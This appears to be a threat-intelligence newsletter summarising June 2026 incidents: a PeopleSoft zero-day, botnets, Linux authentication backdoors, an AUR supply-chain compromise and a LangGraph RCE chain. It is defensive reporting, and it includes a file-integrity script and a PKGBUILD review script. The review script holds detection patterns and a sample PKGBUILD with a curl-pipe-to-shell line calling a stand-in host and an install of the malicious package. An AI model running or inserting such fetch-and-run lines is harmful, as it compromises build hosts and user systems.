BORDER CYBER GROUP — Monday, June 16, 2026
By Jonathan Brown

PRIORITY SCALE
5 — Immediate action required
4 — Patch or monitor this week
3 — Important trend
2 — Background awareness
1 — Strategic context

──────────────

ShinyHunters Ran a 14-Day ERP Zero-Day Campaign Against Higher Education Before Oracle Knew the Flaw Existed PRIORITY: 5

The damage was done before the advisory existed.

Timeline: May 27, attackers begin exploiting CVE-2026-35273. June 9, ShinyHunters posts stolen University of Nottingham data — 40 GB of student billing and personal records — to their data leak site. June 10, Oracle publishes its out-of-band advisory. The gap is fourteen days. Mandiant CTO Charles Carmakal publicly confirmed the zero-day exploitation window, attributing the campaign to UNC6240, the cluster Mandiant associates with ShinyHunters.

The flaw is an unauthenticated RCE vulnerability in PeopleSoft's Environment Management Hub component (PSEMHUB), rated CVSS 9.8, affecting PeopleTools versions 8.61 and 8.62. Across that fourteen-day window, UNC6240 worked through roughly 300 vulnerable instances at more than 100 organizations. Post-compromise, attackers deployed customized MeshCentral agents — hardcoded to reach C2 at wss://azurenetfiles.net:443/agent.ashx — then executed lateral movement via a named script before exfiltrating and publishing data on victims who declined to respond.

The education sector concentration is consistent with deliberate prioritization rather than opportunism: PeopleSoft is the standard ERP stack for universities, shared configurations enable scripted exploitation at scale, and student records carry the FERPA and GDPR regulatory exposure that maximizes extortion leverage. Oracle's remediation consists of mitigations, not patches — introducing misconfiguration risk that a direct software fix eliminates. Any organization running PSEMHUB reachable from outside the firewall should treat that as the primary exposure and lock those endpoints down immediately.

Watch for: Additional named victims on ShinyHunters' DLS in the next 48–72 hours — the group told The Register on June 11 that victim outreach had only just begun.

Sources: Mandiant/GTIG via SecurityWeek, June 12, 2026; The Hacker News, June 11, 2026; The Register, June 11, 2026; CSO Online, June 12, 2026; Oracle out-of-band advisory, June 10, 2026.

──────────────

Volt Typhoon's Reconnaissance Arm Rebuilt After 2024 Takedown — JDY Botnet Has Doubled and Is Scanning U.S. Military Networks PRIORITY: 4

The KV-botnet takedown in early 2024 didn't kill the reconnaissance layer — it separated it. Lumen's Black Lotus Labs reported this week that JDY, a scanning cluster previously embedded within KV-botnet and associated with Volt Typhoon, has expanded from roughly 650 compromised devices in early 2024 to over 1,500 SOHO and IoT devices today, spanning Cisco, Ubiquiti, Hikvision, DrayTek, Araknis, Mimosa Networks, and Linksys hardware distributed across the United States, Europe, and Asia. JDY functions as a centrally controlled fingerprinting engine — it retrieves encrypted scanning tasking from a dispatch service via hidden Tor C2, identifies exposed services by protocol signature and banner pattern rather than port state alone, and returns structured reconnaissance data for downstream exploitation pipelines. Command and control is nearly constant and highly automated; some victim devices are also managed through Platypus, an open-source reverse shell framework.

The targeting data is the significant signal. Lumen's telemetry shows the majority of IP addresses JDY scanned are associated with U.S. military and related defense networks. Separately, Black Lotus Labs observed JDY scan volume against Fortinet devices spike within hours of this week's disclosure of CVE-2026-35616 — illustrating how directly this infrastructure feeds active vulnerability exploitation. This is the sort of reconnaissance infrastructure commonly associated with pre-positioning for future operational access rather than conventional criminal monetization, which is consistent with what China-nexus actors have historically used KV and adjacent clusters for.

Watch for: JDY scanning activity correlating with newly disclosed edge device CVEs within 24 hours of publication — this now appears to be the established operational cadence.

Sources: Lumen Black Lotus Labs report, June 10, 2026; BleepingComputer, June 10, 2026; The Hacker News, June 10, 2026.

──────────────

Velvet Ant's Operation Highland: China-Nexus Group Backdoored Linux PAM and OpenSSH Itself and Stayed Invisible for Nearly a Decade PRIORITY: 3

Sygnia disclosed this week that the China-nexus group it tracks as Velvet Ant — previously documented exploiting Cisco NX-OS switch firmware in 2024 — executed a long-dwell campaign it names Operation Highland in which attackers backdoored PAM and OpenSSH binaries on Linux hosts in an air-gapped-adjacent network, with earliest forensic traces dating to 2016. This is the long-dwell patience story of the year so far.

The method bypassed traditional malware detection entirely. Attackers didn't drop new executables that scanners might flag — they replaced trusted system authentication programs with backdoored versions. Nine distinct variants of the modified PAM login module were recovered: some accepting a secret master password for silent re-entry, others quietly logging all credential input as users authenticated normally. OpenSSH was similarly modified to record every typed command and credential, with a built-in toggle to disable logging during live operator sessions. Because the target network lacked direct internet access, Velvet Ant first staged through perimeter systems before pivoting inward. The cleanup risk is non-trivial: replacing the wrong PAM binary on a live production system can lock administrators out entirely. This is the same actor, the same patience model, now documented from network switches all the way down to the authentication layer of the OS itself. File integrity monitoring on PAM and OpenSSH binaries is the detection primitive here — not antivirus, not network signatures.
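The integrity check named above, as an added example that is not part of Sygnia's report: it baselines SHA-256 hashes of the PAM module directory and the OpenSSH binaries and, on later runs, reports files whose content changed, appeared or vanished, separately flagging a changed file whose modification time did not move. The paths in DEFAULT_TARGETS are an assumed Debian/Ubuntu layout.

```python
"""Baseline-and-compare integrity check for PAM modules and OpenSSH binaries.
Added example, not from the Sygnia report. Hashes the authentication-layer
files on a Linux host and, on later runs, reports files whose content changed,
appeared, or vanished. The watch list assumes Debian/Ubuntu paths; adjust it."""
import hashlib
import json
import sys
from pathlib import Path

DEFAULT_TARGETS = [                      # assumed layout; adapt per distro
    "/lib/x86_64-linux-gnu/security",    # PAM modules such as pam_unix.so
    "/usr/sbin/sshd", "/usr/bin/ssh",
    "/usr/lib/openssh",                  # sshd-session and helper binaries
]

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def collect(targets):
    """Return {path: {"sha256": ..., "mtime": ...}} for every regular file under targets."""
    records = {}
    for target in targets:
        p = Path(target)
        files = [p] if p.is_file() else p.rglob("*") if p.is_dir() else []
        for f in files:
            if f.is_file():
                records[str(f)] = {"sha256": sha256_of(f), "mtime": int(f.stat().st_mtime)}
    return records

def compare(baseline, current):
    """Return sorted (kind, path) findings. A changed hash with an unchanged
    mtime is MODIFIED_TIMESTOMPED: a swapped binary with its timestamp restored."""
    findings = [("MISSING", p) for p in baseline if p not in current]
    for path, rec in current.items():
        old = baseline.get(path)
        if old is None:
            findings.append(("NEW", path))
        elif old["sha256"] != rec["sha256"]:
            stomped = old["mtime"] == rec["mtime"]
            findings.append(("MODIFIED_TIMESTOMPED" if stomped else "MODIFIED", path))
    return sorted(findings)

if __name__ == "__main__":   # usage: fim.py baseline STORE | fim.py check STORE
    mode, store = sys.argv[1], Path(sys.argv[2])
    if mode == "baseline":
        store.write_text(json.dumps(collect(DEFAULT_TARGETS), indent=1))
    else:
        for kind, path in compare(json.loads(store.read_text()), collect(DEFAULT_TARGETS)):
            print(kind, path)
```

Keep the baseline file off the host (or signed), since an attacker who can replace pam_unix.so can also rewrite a local baseline.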

Watch for: Sygnia's full Operation Highland technical report for IOC hashes of the nine PAM variants, which are the artifacts that matter for any retrospective threat hunt on Linux infrastructure.

Sources: Sygnia research, reported by The Hacker News, June 12, 2026.

──────────────

Ivanti Sentry CVE-2026-10520 (CVSS 10.0): From Disclosure to Confirmed Backdoor in 24 Hours PRIORITY: 5

The sequence: Ivanti discloses CVE-2026-10520 — a pre-authentication OS command injection in Sentry yielding root-level code execution, CVSS 10.0 — on June 9. WatchTowr publishes a technical analysis and proof-of-concept the following day. By June 11, Shadowserver Foundation is reporting large-scale exploitation attempts against internet-exposed Sentry instances, and confirms at least two of the 19 vulnerable instances they are tracking have been backdoored. CISA adds CVE-2026-10520 to the KEV catalog following honeypot exploitation reports. Total elapsed time from Ivanti advisory to confirmed backdoor placement: under 24 hours.

The companion flaw, CVE-2026-10523 (CVSS 9.9), is an authentication bypass allowing unauthenticated creation of arbitrary administrator accounts — same affected versions, same patch. Ivanti notes the vulnerable API on CVE-2026-10520 requires access to management port 8443, and that EPMM-managed deployments are protected by mTLS — but internet-exposed management interfaces exist in the wild, which is the exposure. Ivanti's historical track record means this is exactly what the threat model predicts. The federal KEV remediation deadline was June 14.

Watch for: Actor attribution on the backdoored Sentry instances — Ivanti Sentry has previously attracted both DPRK and PRC-linked operators, and the speed of exploitation is consistent with pre-staged tooling rather than opportunistic scanning.

Sources: Ivanti advisory, June 9, 2026; WatchTowr analysis, June 10, 2026; Rapid7 blog, June 10–11, 2026; Help Net Security, June 10, 2026; Dark Reading, June 12, 2026.

──────────────

Atomic Arch: 400+ AUR Packages Backdoored With a Rust Credential Stealer and an eBPF Rootkit That Defeats Standard Forensic Tools PRIORITY: 4

Starting June 11, an attacker compromised more than 400 packages in the Arch User Repository by taking over maintainer accounts and adopting at least 20 orphaned packages, then modifying PKGBUILD scripts to invoke npm and pull in a malicious package called atomic-lockfile. That package installs a Rust binary (named deps) that sweeps developer credentials and secrets. When it executes with root — which AUR helpers like yay, paru, pikaur, and aurutils commonly do — it additionally loads an eBPF rootkit that intercepts directory listing calls, hiding PIDs, process names, socket inodes, and its own service files from ps, ss, netstat, and /proc. Standard live-response forensic tools on a rootkit-positive host are not trustworthy for cleanup. Sonatype tracks the campaign as Sonatype-2026-003775 (CVSS 8.7). By June 12, a second wave reportedly pushed the total past 1,500 compromised packages per community tracking.

Any AUR package built or updated on or after June 11 requires a full PKGBUILD diff review. Community detection scripts are available via GitHub (lenucksi/aur-malware-check). The official Arch repositories were not affected.
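One way to run that PKGBUILD diff review, as an added example that is neither the lenucksi/aur-malware-check script nor Sonatype's tooling: it diffs the previous and current PKGBUILD and flags only added lines that invoke npm/npx/yarn, pipe a download into a shell, decode base64 at build time, or name atomic-lockfile. The sample PKGBUILDs, package name and URL are constructed.

```python
"""Heuristic diff review for AUR PKGBUILDs (added example, not the
lenucksi/aur-malware-check script). Flags lines the new PKGBUILD added that
invoke npm/npx/yarn, pipe a download into a shell, decode base64, or name
atomic-lockfile. A hit is a review prompt, not proof; Node packages call npm."""
import difflib
import re

RULES = [
    ("npm-invocation", re.compile(r"(^|[\s;&|(])(npm|npx|yarn|pnpm)\b")),
    ("known-bad-package", re.compile(r"atomic-lockfile")),
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("base64-decode", re.compile(r"\bbase64\b.*(-d\b|--decode)")),
]
FUNC_START = re.compile(r"^\s*(\w+)\s*\(\)\s*\{")

def scan_pkgbuild(text):
    """Return (line_no, enclosing_function, rule, stripped_line) per hit."""
    findings, func = [], None
    for n, line in enumerate(text.splitlines(), 1):
        m = FUNC_START.match(line)
        if m:
            func = m.group(1)          # entering prepare()/build()/package()...
        elif line.strip() == "}":
            func = None
        for rule, rx in RULES:
            if rx.search(line):
                findings.append((n, func, rule, line.strip()))
    return findings

def review_diff(old_text, new_text):
    """Keep only hits on lines the new PKGBUILD added relative to the old one."""
    diff = difflib.unified_diff(old_text.splitlines(), new_text.splitlines(), lineterm="", n=0)
    added = {l[1:].strip() for l in diff if l.startswith("+") and not l.startswith("+++")}
    return [f for f in scan_pkgbuild(new_text) if f[3] in added]
# Constructed sample: a clean PKGBUILD, then the same package after a takeover
# inserted a prepare() step (package name, URL and version are made up).
OLD_PKGBUILD = """\
pkgname=foo-tool
pkgver=1.2.0
build() {
  cd "$srcdir/foo-$pkgver"
  make
}
"""
NEW_PKGBUILD = OLD_PKGBUILD.replace("build() {", """\
prepare() {
  cd "$srcdir"
  npm install atomic-lockfile --prefix "$srcdir/.deps"
  curl -s https://example.invalid/setup | sh
}
build() {""", 1)
if __name__ == "__main__":
    for n, func, rule, line in review_diff(OLD_PKGBUILD, NEW_PKGBUILD):
        print(f"line {n} in {func}(): {rule}: {line}")
```

Because only added lines are scored, a Node package that has always run npm is not re-flagged on a routine pkgver bump; the first appearance of npm in a package that never needed it is what surfaces.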

Watch for: Attribution on the maintainer account takeover mechanism — whether credential stuffing or social engineering determines whether this pattern is portable to npm, PyPI, and RubyGems at meaningful scale.

Sources: Sonatype research, Sonatype-2026-003775, June 11–12, 2026; BleepingComputer, June 12, 2026; The Hacker News, June 12, 2026.

──────────────

Check Point Research: SQLi Chains to Full RCE in LangGraph's Checkpoint Layer — 46 Million Monthly Downloads at Risk PRIORITY: 4

Check Point Research published the attack chain on June 12. Step one: CVE-2025-67644 (CVSS 7.3), SQL injection in LangGraph's SQLite checkpointer via the get_state_history() endpoint, exploitable when user-controlled filter input is accepted. Step two: CVE-2026-28277 (CVSS 6.8), unsafe msgpack deserialization when a checkpoint is loaded. The attacker uses the SQLi to write a malicious checkpoint; deserialization of that checkpoint achieves unauthenticated RCE on the server. A third parallel issue, CVE-2026-27022 (CVSS 6.5), introduces the same injection class into the Redis checkpointer backend. Patches exist: langgraph-checkpoint-sqlite 3.0.1+, langgraph 1.0.10+, langgraph-checkpoint-redis 1.0.2+. LangChain's managed cloud platform is not affected.

The structural point is not the specific CVEs — it is that AI agent frameworks carry privileged credentials, long-lived API keys, and trusted external system identities. A mid-severity SQLi in a standard application is a data exposure risk. The same SQLi in an agent runtime with CRM access, internal API credentials, and operator permissions is a full enterprise access event. That gap is the security debt accumulating across every team that is deploying agentic infrastructure without the same scrutiny they apply to privileged service accounts.

Watch for: Exploitation scanning against exposed LangGraph get_state_history() endpoints — the attack chain is public, the affected population numbers in the thousands of production deployments.

Sources: Check Point Research ("From SQLi to RCE — Exploiting LangGraph's Checkpointer"), June 12, 2026; The Hacker News, June 12, 2026.

──────────────

Google Files Suit Against Chinese PhaaS Operator for Weaponizing Gemini — FBI Ties Network to $1.9 Billion in Losses PRIORITY: 3

Google filed suit in Manhattan federal court on June 12 against Outsider Enterprise, a China-based phishing-as-a-service network the FBI links to an estimated 3.87 million stolen credit card numbers and approximately $1.9 billion in losses since July 2023. The complaint alleges operators actively encouraged each other to use Gemini to generate custom phishing page code, which was imported directly into the Outsider toolkit — a library of over 290 pre-built templates impersonating Google, YouTube, USPS, financial institutions, and toll services — and distributed via Telegram bot at $88 per week. Between November 2025 and April 2026, Google detected over 1.59 million malicious URLs tied to Outsider infrastructure. A coordinated action, Operation Ghost Hook under the FBI's broader Operation Riptide, ran in parallel: domain seizures, approximately $100,000 USDT confiscated from Outsider payment wallets, and thousands of phishing domains rerouted to an FBI splash page. The Outsider Telegram bot was also leveraged by the FBI to gather customer data for follow-on investigation.

Watch for: Whether Operation Riptide surfaces the Outsider customer network — the bot access path is now a documented investigative instrument for identifying downstream criminal affiliates.

Sources: Google complaint, June 12, 2026; The Hacker News, June 12, 2026; Bank Info Security, June 12, 2026; Decrypt, June 14, 2026.

──────────────

Fortinet CVE-2026-25089: Pre-Auth Command Injection in the Security Sandbox, JDY Scanned for It Within Hours PRIORITY: 4

Fortinet disclosed CVE-2026-25089 (CVSS 9.8) on June 9 — an OS command injection in the FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS web UI, exploitable by an unauthenticated attacker via crafted HTTP requests to the management interface. The flaw is a second-order injection path in the "start VNC" GUI feature. Patches are in FortiSandbox 5.0.6 and 4.4.9. Fortinet reported no known exploitation at disclosure time. However, per Lumen's Black Lotus Labs, JDY botnet scanning of Fortinet devices increased within hours of the advisory — which is the established tempo for China-nexus reconnaissance infrastructure feeding downstream exploitation pipelines. Compromising a security sandbox gives an attacker visibility into what the organization is analyzing and a foothold in a system that typically has broad network access for detonation purposes.

Watch for: CISA KEV addition. Any exploitation confirmation would elevate this to an immediate-action item given the foothold value of sandbox access.

Sources: Fortinet advisory FG-IR-26-141, June 9, 2026; SecurityWeek, June 10, 2026; CSA Singapore advisory AL-2026-073; Lumen Black Lotus Labs, June 10, 2026.

──────────────

Android CVE-2025-48595 Was Exploited Before the June 2 Patch — CISA KEV Deadline Has Now Passed for Federal Agencies PRIORITY: 4

Google's June 2 Android Security Bulletin confirmed active exploitation of CVE-2025-48595 (CVSS 8.4) prior to patching — a true zero-day. The flaw is an integer overflow in multiple locations within the Android Framework enabling local privilege escalation without user interaction, affecting Android 14, 15, 16, and 16 QPR2. CISA added it to the KEV catalog on June 2 with a federal civilian remediation deadline of June 5. The attack vector is local, indicating delivery most likely via a malicious application installed through social engineering, followed by escalation to system-level privileges. No exploit chain details have been made public, and Google has not attributed exploitation. The federal deadline has passed. For enterprise MDM environments managing Android estates that include non-Pixel, carrier-locked, or budget-tier devices on Android 14, patch availability may be weeks or months out — that is the live exposure window.

Watch for: Actor attribution on CVE-2025-48595 exploitation — the "limited, targeted" language from Google is consistent with a commercial spyware operator or state-affiliated mobile intrusion team.

Sources: Google Android Security Bulletin, June 2, 2026; CISA KEV catalog, June 2, 2026; Help Net Security, June 2, 2026.

──────────────

Operation Ramz: INTERPOL Names SniperDz After a Four-Month Silence — Nine Years of PhaaS Operations, 201 Arrests PRIORITY: 2

INTERPOL concluded Operation Ramz in February 2026 — 201 arrests, 53 servers seized across 13 MENA countries — but deliberately withheld the platform name in its May announcement. Group-IB named it on June 11: SniperDz, a PhaaS network active since 2015 that rebranded repeatedly as Joker Dz, Storm Dz, and Spam Dz. The primary developer and administrator, identified by alias as Guedz, was arrested by the Algerian National Police acting on intelligence compiled and shared by Group-IB. The platform offered 80 phishing template kits, hosting, and operational support via Telegram and Facebook, targeting 30+ major platforms across 20,000+ domains. The four-month gap between operation conclusion and public naming is the detail worth noting — it suggests the seized server hardware was being worked for follow-on intelligence before the name was released. INTERPOL disseminated nearly 8,000 data packages to participating countries to support future prosecutions.

Watch for: Follow-on criminal charges from those intelligence packages — this was as much a collection operation as an arrest operation.

Sources: INTERPOL press release, May 18, 2026; Group-IB press release, June 11, 2026; Infosecurity Magazine, June 12, 2026; The Hacker News, June 12, 2026.

───────────────────────────────────────────────────

Jonathan Brown | Border Cyber Group
bordercybergroup.com
Independent cybersecurity research and investigative journalism. If this feed is valuable to your work, consider supporting BCG directly.